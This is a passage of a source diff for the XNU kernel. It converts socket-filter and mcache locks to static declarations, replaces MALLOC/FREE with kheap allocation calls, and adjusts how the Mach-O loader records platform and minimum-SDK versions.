lck_rw_alloc_init(lck_group, lck_attrib); - sock_filter_cleanup_lock = lck_mtx_alloc_init(lck_group, lck_attrib); - lck_grp_free(lck_group); - lck_attr_free(lck_attrib); -} - static void sflt_retain_locked(struct socket_filter *filter) { @@ -175,14 +164,14 @@ sflt_release_locked(struct socket_filter *filter) if (os_ref_release_locked(&filter->sf_refcount) == 0) { /* Call the unregistered function */ if (filter->sf_filter.sf_unregistered) { - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); filter->sf_filter.sf_unregistered( filter->sf_filter.sf_handle); - lck_rw_lock_exclusive(sock_filter_lock); + 
lck_rw_lock_exclusive(&sock_filter_lock); } /* Free the entry */ - FREE(filter, M_IFADDR); + kheap_free(KM_IFADDR, filter, sizeof(struct socket_filter)); } } @@ -203,7 +192,7 @@ sflt_entry_release(struct socket_filter_entry *entry) /* That was the last reference */ /* Take the cleanup lock */ - lck_mtx_lock(sock_filter_cleanup_lock); + lck_mtx_lock(&sock_filter_cleanup_lock); /* Put this item on the cleanup list */ entry->sfe_next_oncleanup = sock_filter_cleanup_entries; @@ -222,7 +211,7 @@ sflt_entry_release(struct socket_filter_entry *entry) } /* Drop the cleanup lock */ - lck_mtx_unlock(sock_filter_cleanup_lock); + lck_mtx_unlock(&sock_filter_cleanup_lock); } else if (old <= 0) { panic("sflt_entry_release - sfe_refcount (%d) <= 0\n", (int)old); @@ -236,11 +225,11 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) { #pragma unused(blah, blah2) while (1) { - lck_mtx_lock(sock_filter_cleanup_lock); + lck_mtx_lock(&sock_filter_cleanup_lock); while (sock_filter_cleanup_entries == NULL) { /* Sleep until we've got something better to do */ msleep(&sock_filter_cleanup_entries, - sock_filter_cleanup_lock, PWAIT, + &sock_filter_cleanup_lock, PWAIT, "sflt_cleanup", NULL); } @@ -249,10 +238,10 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) sock_filter_cleanup_entries = NULL; /* Drop the lock */ - lck_mtx_unlock(sock_filter_cleanup_lock); + lck_mtx_unlock(&sock_filter_cleanup_lock); /* Take the socket filter lock */ - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* Cleanup every dead item */ struct socket_filter_entry *entry; @@ -265,7 +254,7 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) if ((entry->sfe_flags & SFEF_NODETACH) == 0 && entry->sfe_filter->sf_filter.sf_detach) { entry->sfe_flags |= SFEF_NODETACH; - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); /* * Warning - passing a potentially @@ -274,7 +263,7 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) 
entry->sfe_filter->sf_filter.sf_detach( entry->sfe_cookie, entry->sfe_socket); - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); } /* @@ -308,11 +297,11 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) sflt_release_locked(entry->sfe_filter); entry->sfe_socket = NULL; entry->sfe_filter = NULL; - FREE(entry, M_IFADDR); + kheap_free(KM_IFADDR, entry, sizeof(struct socket_filter_entry)); } /* Drop the socket filter lock */ - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); } /* NOTREACHED */ } @@ -339,8 +328,8 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter, } } /* allocate the socket filter entry */ - MALLOC(entry, struct socket_filter_entry *, sizeof(*entry), M_IFADDR, - M_WAITOK); + entry = kheap_alloc(KM_IFADDR, sizeof(struct socket_filter_entry), + Z_WAITOK); if (entry == NULL) { return ENOMEM; } @@ -369,7 +358,7 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter, * Release the filter lock -- * callers must be aware we will do this */ - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); /* Unlock the socket */ if (socklocked) { @@ -386,7 +375,7 @@ sflt_attach_locked(struct socket *so, struct socket_filter *filter, } /* Lock the filters again */ - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* * If the attach function returns an error, @@ -414,7 +403,7 @@ sflt_attach_internal(socket_t socket, sflt_handle handle) int result = EINVAL; - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); struct socket_filter *filter = NULL; TAILQ_FOREACH(filter, &sock_filter_head, sf_global_next) { @@ -427,7 +416,7 @@ sflt_attach_internal(socket_t socket, sflt_handle handle) result = sflt_attach_locked(socket, filter, 1); } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); return result; } @@ -452,11 +441,11 @@ 
sflt_initsock(struct socket *so) */ struct protosw *proto = so->so_proto->pr_protosw; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); if (TAILQ_FIRST(&proto->pr_filter_head) != NULL) { /* Promote lock to exclusive */ - if (!lck_rw_lock_shared_to_exclusive(sock_filter_lock)) { - lck_rw_lock_exclusive(sock_filter_lock); + if (!lck_rw_lock_shared_to_exclusive(&sock_filter_lock)) { + lck_rw_lock_exclusive(&sock_filter_lock); } /* @@ -495,7 +484,7 @@ sflt_initsock(struct socket *so) filter = filter_next; } } - lck_rw_done(sock_filter_lock); + lck_rw_done(&sock_filter_lock); } /* @@ -506,7 +495,7 @@ sflt_initsock(struct socket *so) __private_extern__ void sflt_termsock(struct socket *so) { - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); struct socket_filter_entry *entry; @@ -537,16 +526,16 @@ sflt_termsock(struct socket *so) entry->sfe_flags |= SFEF_NODETACH; /* Drop the lock before calling the detach function */ - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); sfe_filter->sf_filter.sf_detach(sfe_cookie, so); - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* Release the filter */ sflt_release_locked(sfe_filter); } } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); } @@ -561,7 +550,7 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param, struct socket_filter_entry *entry; int unlocked = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && entry->sfe_filter->sf_filter.sf_notify && @@ -572,7 +561,7 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param, * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the 
socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -588,11 +577,11 @@ sflt_notify_internal(struct socket *so, sflt_event_t event, void *param, * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked != 0) { socket_lock(so, 0); @@ -623,7 +612,7 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -633,7 +622,7 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -649,11 +638,11 @@ sflt_ioctl(struct socket *so, u_long cmd, caddr_t data) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -673,7 +662,7 @@ sflt_bind(struct socket *so, const struct sockaddr *nam) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -683,7 +672,7 @@ sflt_bind(struct socket *so, const struct sockaddr *nam) * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket 
isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -699,11 +688,11 @@ sflt_bind(struct socket *so, const struct sockaddr *nam) * Take the socket filter lock again and * release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -723,7 +712,7 @@ sflt_listen(struct socket *so) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -733,7 +722,7 @@ sflt_listen(struct socket *so) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -749,11 +738,11 @@ sflt_listen(struct socket *so) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -774,7 +763,7 @@ sflt_accept(struct socket *head, struct socket *so, int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -784,7 +773,7 @@ sflt_accept(struct socket *head, struct socket *so, * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -800,11 +789,11 @@ sflt_accept(struct socket *head, 
struct socket *so, * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -824,7 +813,7 @@ sflt_getsockname(struct socket *so, struct sockaddr **local) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -834,7 +823,7 @@ sflt_getsockname(struct socket *so, struct sockaddr **local) * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -850,11 +839,11 @@ sflt_getsockname(struct socket *so, struct sockaddr **local) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -874,7 +863,7 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -884,7 +873,7 @@ sflt_getpeername(struct socket *so, struct sockaddr **remote) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -900,11 +889,11 @@ sflt_getpeername(struct socket *so, struct 
sockaddr **remote) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -924,7 +913,7 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -934,7 +923,7 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -950,11 +939,11 @@ sflt_connectin(struct socket *so, const struct sockaddr *remote) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -970,7 +959,7 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -980,7 +969,7 @@ sflt_connectout_common(struct socket *so, const struct sockaddr *nam) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -996,11 +985,11 @@ 
sflt_connectout_common(struct socket *so, const struct sockaddr *nam) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1054,7 +1043,7 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -1064,7 +1053,7 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -1080,11 +1069,11 @@ sflt_setsockopt(struct socket *so, struct sockopt *sopt) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1104,7 +1093,7 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt) int unlocked = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { if ((entry->sfe_flags & SFEF_ATTACHED) && @@ -1114,7 +1103,7 @@ sflt_getsockopt(struct socket *so, struct sockopt *sopt) * the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -1130,11 +1119,11 @@ 
sflt_getsockopt(struct socket *so, struct sockopt *sopt) * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1156,7 +1145,7 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data, int setsendthread = 0; int error = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && error == 0; entry = entry->sfe_next_onsocket) { /* skip if this is a subflow socket */ @@ -1170,7 +1159,7 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data, * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if (unlocked == 0) { @@ -1191,11 +1180,11 @@ sflt_data_out(struct socket *so, const struct sockaddr *to, mbuf_t *data, * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1219,7 +1208,7 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data, int error = 0; int unlocked = 0; - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); for (entry = so->so_filt; entry && (error == 0); entry = entry->sfe_next_onsocket) { @@ -1234,7 +1223,7 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data, * release the socket filter lock */ sflt_entry_retain(entry); - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); /* If the socket isn't already unlocked, unlock it */ if 
(unlocked == 0) { @@ -1250,11 +1239,11 @@ sflt_data_in(struct socket *so, const struct sockaddr *from, mbuf_t *data, * Take the socket filter lock again * and release the entry */ - lck_rw_lock_shared(sock_filter_lock); + lck_rw_lock_shared(&sock_filter_lock); sflt_entry_release(entry); } } - lck_rw_unlock_shared(sock_filter_lock); + lck_rw_unlock_shared(&sock_filter_lock); if (unlocked) { socket_lock(so, 0); @@ -1284,7 +1273,7 @@ sflt_detach(socket_t socket, sflt_handle handle) return EINVAL; } - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); for (entry = socket->so_filt; entry; entry = entry->sfe_next_onsocket) { if (entry->sfe_filter->sf_filter.sf_handle == handle && (entry->sfe_flags & SFEF_ATTACHED) != 0) { @@ -1295,7 +1284,7 @@ sflt_detach(socket_t socket, sflt_handle handle) if (entry != NULL) { sflt_detach_locked(entry); } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); return result; } @@ -1333,14 +1322,12 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, } /* Allocate the socket filter */ - MALLOC(sock_filt, struct socket_filter *, sizeof(*sock_filt), - M_IFADDR, M_WAITOK); + sock_filt = kheap_alloc(KM_IFADDR, + sizeof(struct socket_filter), Z_WAITOK | Z_ZERO); if (sock_filt == NULL) { return ENOBUFS; } - bzero(sock_filt, sizeof(*sock_filt)); - /* Legacy sflt_filter length; current structure minus extended */ len = sizeof(*filter) - sizeof(struct sflt_filter_ext); /* @@ -1359,7 +1346,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, } bcopy(filter, &sock_filt->sf_filter, len); - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* Look for an existing entry */ TAILQ_FOREACH(match, &sock_filter_head, sf_global_next) { if (match->sf_filter.sf_handle == @@ -1384,10 +1371,10 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, 
INC_ATOMIC_INT64_LIM(net_api_stats.nas_sfltr_register_os_total); } } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); if (match != NULL) { - FREE(sock_filt, M_IFADDR); + kheap_free(KM_IFADDR, sock_filt, sizeof(struct socket_filter)); return EEXIST; } @@ -1415,8 +1402,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, !SOCK_CHECK_TYPE(so, type)) { continue; } - MALLOC(solist, struct solist *, sizeof(*solist), - M_IFADDR, M_NOWAIT); + solist = kheap_alloc(KHEAP_TEMP, sizeof(struct solist), Z_NOWAIT); if (!solist) { continue; } @@ -1434,8 +1420,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, !SOCK_CHECK_TYPE(so, type)) { continue; } - MALLOC(solist, struct solist *, sizeof(*solist), - M_IFADDR, M_NOWAIT); + solist = kheap_alloc(KHEAP_TEMP, sizeof(struct solist), Z_NOWAIT); if (!solist) { continue; } @@ -1480,7 +1465,7 @@ sflt_register_common(const struct sflt_filter *filter, int domain, int type, sock_release(so); solist = solisthead; solisthead = solisthead->next; - FREE(solist, M_IFADDR); + kheap_free(KHEAP_TEMP, solist, sizeof(struct solist)); } return error; @@ -1504,7 +1489,7 @@ errno_t sflt_unregister(sflt_handle handle) { struct socket_filter *filter; - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); /* Find the entry by the handle */ TAILQ_FOREACH(filter, &sock_filter_head, sf_global_next) { @@ -1537,7 +1522,7 @@ sflt_unregister(sflt_handle handle) sflt_release_locked(filter); } - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); if (filter == NULL) { return ENOENT; diff --git a/bsd/kern/mach_loader.c b/bsd/kern/mach_loader.c index d01293ca7..28b5c4fd1 100644 --- a/bsd/kern/mach_loader.c +++ b/bsd/kern/mach_loader.c @@ -1373,6 +1373,15 @@ parse_machfile( } vmc = (struct version_min_command *) lcp; ret = load_version(vmc, &found_version_cmd, imgp->ip_flags, result); +#if 
XNU_TARGET_OS_OSX + if (ret == LOAD_SUCCESS) { + if (result->ip_platform == PLATFORM_IOS) { + vm_map_mark_alien(map); + } else { + assert(!vm_map_is_alien(map)); + } + } +#endif /* XNU_TARGET_OS_OSX */ break; } case LC_BUILD_VERSION: { @@ -1390,7 +1399,15 @@ parse_machfile( } result->ip_platform = bvc->platform; result->lr_sdk = bvc->sdk; + result->lr_min_sdk = bvc->minos; found_version_cmd = TRUE; +#if XNU_TARGET_OS_OSX + if (result->ip_platform == PLATFORM_IOS) { + vm_map_mark_alien(map); + } else { + assert(!vm_map_is_alien(map)); + } +#endif /* XNU_TARGET_OS_OSX */ break; } default: @@ -2502,6 +2519,7 @@ load_version( { uint32_t platform = 0; uint32_t sdk; + uint32_t min_sdk; if (vmc->cmdsize < sizeof(*vmc)) { return LOAD_BADMACHO; @@ -2511,6 +2529,7 @@ load_version( } *found_version_cmd = TRUE; sdk = vmc->sdk; + min_sdk = vmc->version; switch (vmc->cmd) { case LC_VERSION_MIN_MACOSX: platform = PLATFORM_MACOS; @@ -2547,10 +2566,12 @@ load_version( /* All LC_VERSION_MIN_* load commands are legacy and we will not be adding any more */ default: sdk = (uint32_t)-1; + min_sdk = (uint32_t)-1; __builtin_unreachable(); } result->ip_platform = platform; - result->lr_min_sdk = sdk; + result->lr_min_sdk = min_sdk; + result->lr_sdk = sdk; return LOAD_SUCCESS; } @@ -3005,7 +3026,7 @@ load_dylinker( /* Allocate wad-of-data from heap to reduce excessively deep stacks */ - MALLOC(dyld_data, void *, sizeof(*dyld_data), M_TEMP, M_WAITOK); + dyld_data = kheap_alloc(KHEAP_TEMP, sizeof(*dyld_data), Z_WAITOK); header = &dyld_data->__header; myresult = &dyld_data->__myresult; macho_data = &dyld_data->__macho_data; @@ -3061,7 +3082,7 @@ load_dylinker( vnode_put(vp); kheap_free(KHEAP_TEMP, va, sizeof(*va)); novp_out: - FREE(dyld_data, M_TEMP); + kheap_free(KHEAP_TEMP, dyld_data, sizeof(*dyld_data)); return ret; } diff --git a/bsd/kern/mcache.c b/bsd/kern/mcache.c index 76b4c601e..693a14437 100644 --- a/bsd/kern/mcache.c +++ b/bsd/kern/mcache.c @@ -86,13 +86,13 @@ * caches when memory 
runs low. */ #define MCACHE_LIST_LOCK() { \ - lck_mtx_lock(mcache_llock); \ + lck_mtx_lock(&mcache_llock); \ mcache_llock_owner = current_thread(); \ } #define MCACHE_LIST_UNLOCK() { \ mcache_llock_owner = NULL; \ - lck_mtx_unlock(mcache_llock); \ + lck_mtx_unlock(&mcache_llock); \ } #define MCACHE_LOCK(l) lck_mtx_lock(l) @@ -101,11 +101,9 @@ static unsigned int ncpu; static unsigned int cache_line_size; -static lck_mtx_t *mcache_llock; static struct thread *mcache_llock_owner; -static lck_attr_t *mcache_llock_attr; -static lck_grp_t *mcache_llock_grp; -static lck_grp_attr_t *mcache_llock_grp_attr; +static LCK_GRP_DECLARE(mcache_llock_grp, "mcache.list"); +static LCK_MTX_DECLARE(mcache_llock, &mcache_llock_grp); static struct zone *mcache_zone; static const uint32_t mcache_reap_interval = 15; static const uint32_t mcache_reap_interval_leeway = 2; @@ -122,9 +120,6 @@ static unsigned int mcache_flags = 0; int mca_trn_max = MCA_TRN_MAX; -#define DUMP_MCA_BUF_SIZE 512 -static char *mca_dump_buf; - static mcache_bkttype_t mcache_bkttype[] = { { 1, 4096, 32768, NULL }, { 3, 2048, 16384, NULL }, @@ -140,7 +135,7 @@ static mcache_bkttype_t mcache_bkttype[] = { static mcache_t *mcache_create_common(const char *, size_t, size_t, mcache_allocfn_t, mcache_freefn_t, mcache_auditfn_t, mcache_logfn_t, - mcache_notifyfn_t, void *, u_int32_t, int, int); + mcache_notifyfn_t, void *, u_int32_t, int); static unsigned int mcache_slab_alloc(void *, mcache_obj_t ***, unsigned int, int); static void mcache_slab_free(void *, mcache_obj_t *, boolean_t); @@ -189,12 +184,6 @@ mcache_init(void) ncpu = ml_wait_max_cpus(); (void) mcache_cache_line_size(); /* prime it */ - mcache_llock_grp_attr = lck_grp_attr_alloc_init(); - mcache_llock_grp = lck_grp_alloc_init("mcache.list", - mcache_llock_grp_attr); - mcache_llock_attr = lck_attr_alloc_init(); - mcache_llock = lck_mtx_alloc_init(mcache_llock_grp, mcache_llock_attr); - mcache_reap_tcall = thread_call_allocate(mcache_reap_timeout, NULL); 
mcache_update_tcall = thread_call_allocate(mcache_update, NULL); if (mcache_reap_tcall == NULL || mcache_update_tcall == NULL) { @@ -258,11 +247,10 @@ mcache_cache_line_size(void) */ __private_extern__ mcache_t * mcache_create(const char *name, size_t bufsize, size_t align, - u_int32_t flags, int wait) + u_int32_t flags, int wait __unused) { return mcache_create_common(name, bufsize, align, mcache_slab_alloc, - mcache_slab_free, mcache_slab_audit, NULL, NULL, NULL, flags, 1, - wait); + mcache_slab_free, mcache_slab_audit, NULL, NULL, NULL, flags, 1); } /* @@ -274,10 +262,10 @@ __private_extern__ mcache_t * mcache_create_ext(const char *name, size_t bufsize, mcache_allocfn_t allocfn, mcache_freefn_t freefn, mcache_auditfn_t auditfn, mcache_logfn_t logfn, mcache_notifyfn_t notifyfn, void *arg, - u_int32_t flags, int wait) + u_int32_t flags, int wait __unused) { return mcache_create_common(name, bufsize, 0, allocfn, - freefn, auditfn, logfn, notifyfn, arg, flags, 0, wait); + freefn, auditfn, logfn, notifyfn, arg, flags, 0); } /* @@ -287,7 +275,7 @@ static mcache_t * mcache_create_common(const char *name, size_t bufsize, size_t align, mcache_allocfn_t allocfn, mcache_freefn_t freefn, mcache_auditfn_t auditfn, mcache_logfn_t logfn, mcache_notifyfn_t notifyfn, void *arg, - u_int32_t flags, int need_zone, int wait) + u_int32_t flags, int need_zone) { mcache_bkttype_t *btp; mcache_t *cp = NULL; @@ -296,23 +284,11 @@ mcache_create_common(const char *name, size_t bufsize, size_t align, unsigned int c; char lck_name[64]; - /* If auditing is on and print buffer is NULL, allocate it now */ - if ((flags & MCF_DEBUG) && mca_dump_buf == NULL) { - int malloc_wait = (wait & MCR_NOSLEEP) ? 
